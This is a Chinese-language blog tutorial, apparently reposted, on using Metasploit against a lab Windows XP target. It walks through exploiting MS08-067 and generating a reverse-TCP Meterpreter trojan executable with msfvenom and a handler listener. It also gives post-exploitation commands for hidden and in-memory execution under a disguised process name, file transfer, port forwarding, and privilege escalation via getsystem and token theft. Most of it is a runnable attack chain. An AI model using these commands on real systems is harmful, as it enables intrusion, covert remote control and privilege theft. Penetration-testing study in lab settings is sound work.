zoukankan      html  css  js  c++  java
  • (msf使用)msfconsole

    ⭐【msf】 msfconsole meterpreter


    对于这款强大渗透测试框架,详情介绍可看这里:metasploit 使用教程


    对于msfconsole, Kali Linux 自带。只需用命令行启动便可。


    ⭐msfconsole 启动不了/初次使用


    service postgresql start     # 启动数据库服务
    msfdb init             # 初始化数据库
    msfconsole             # 启动metasploit
    

    【注】msfconsole 不会就用 msfconsole -h msf5 > help 查看帮助


    ⭐ms08-067漏洞攻击实践


    ifconfig 命令 可 查看kail 系统ip ipconfig 查看 Windows ip

    kali: 192.168.xxx.xxx (攻击靶机)


    windows xp xxx : 192.168.xxx.xxx (被攻击靶机)


    msfconsole - 进入


    msfconsole
    


    红框中 标记的是:Metasploit所有的利用模块、payload、post模块等等模块


    search - 查看漏洞


    search ms08_067
    


    use - 使用漏洞


    use exploit/windows/smb/ms08_067_netapi
    

    show - 查看可以攻击的靶机操作系统型号(targets)


    show targets
    

    set - 设置target 参数


    xx是对应被攻击靶机的型号


    set target xx
    

    set - 设置rhost参数


    此ip为被攻击靶机的ip地址


    set rhost 192.168.xxx.xxx
    

    show - 查看参数


    show options
    


    exploit - 进行攻击


    exploit
    


    session 查看目前服务器端会话

    sessions -i
    


    启动x会话 。

    sessions -i x
    


    之后用 meterpreter 命令,转 shell 命令

    shell
    

    back - 实现返回


    back
    


    查看 payload

    show payloads
    

    ⭐利用msfvenom生成木马攻击靶场


    【参考链接】: i春秋 Meterpreter综合提权


    msfvenom 生成 .exe 文件


    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.xxx.xxx lport=yyyy -f exe -o /tmp/muma.exe
    
    windows/meterpreter/reverse_tcp : payload
    lhost :木马反弹到的监听端地址=192.168.xxx.xxx
    lport :监听端口=yyyy
    

    常见 msfvenom 命令参数如下:


    -p 选择一个载荷(payload)


    -l 载荷列表


    -f 生成的文件格式


    -e 编码方式


    -i 编码次数


    -b 在生成的程序中避免出现的值


    -h 帮助


    用msfconsole监听


    选用 exploit/multi/handler 监听模块


    use exploit/multi/handler
    

    设置payload:


    set payload windows/x64/meterpreter/reverse_tcp
    

    设置 监听ip地址以及监听端口:


    set lhost 192.168.xxx.xxx
    
    set lport yyyy
    

    查看设置参数:


    show options
    

    开启配置模块进行监听


    exploit
    



    ⭐Meterpreter


    Meterpreter命令详解


    常见命令


    upload - 上传文件


    上传1.txt到目标靶机c:muma下


    upload 1.txt c:\muma\
    


    download - 下载目标靶机相对应权限的任意路径下的文件


    命令 download file path


    download c:\muma\1.txt
    

    sysinfo 命令:


    显示远程主机的系统信息,显示计算机、系统信息、结构、语言等信息。


    运行目标主机上的cmd.exe程序,以隐藏的方式直接交互到meterpreter会话上


    execute  -H -i -f cmd.exe
    

    execute  -H -m -d notepad.exe-f  muma.exe -a "-o muma.txt"
    
    -d 在目标主机执行时显示的进程名称(用以伪装)
    
    -m 直接从内存中执行
    
    "-o muma.txt"是muma.exe的运行参数
    

    网络命令


    portfwd 命令:


    portfwd add -l yyyy -p zzzz -r 192.168.xxx.xxx # 端口转发,本机监听yyyy,把目标机zzzz转到本机yyyy
    
    netstat -an | grep"yyyy" #查看指定端口开放情况
    

    基础提权


    getsystem
    


    利用 ps 命令查看目标靶机当前进程


    找到管理员相应PID。若PID:xxxx


    steal_token xxxx
    #盗取guanliyuan
    getuid
    #检查是否成功
    shell
    

    【侵权删】


    【转载请放链接】 https://www.cnblogs.com/Jlay/p/msf.html

  • 相关阅读:
    IDEA学习和收藏夹
    mysql资料收集及学习
    一些模板代码
    docker学习
    Spring事务传播类型
    rust学习疑惑
    [重新做人]从头学习JAVA SE——java.lang.reflect
    java核心技术卷一
    Spring实战 难懂的JavaBean
    Spring实战系列
  • 原文地址:https://www.cnblogs.com/Jlay/p/msf.html
Copyright © 2011-2022 走看看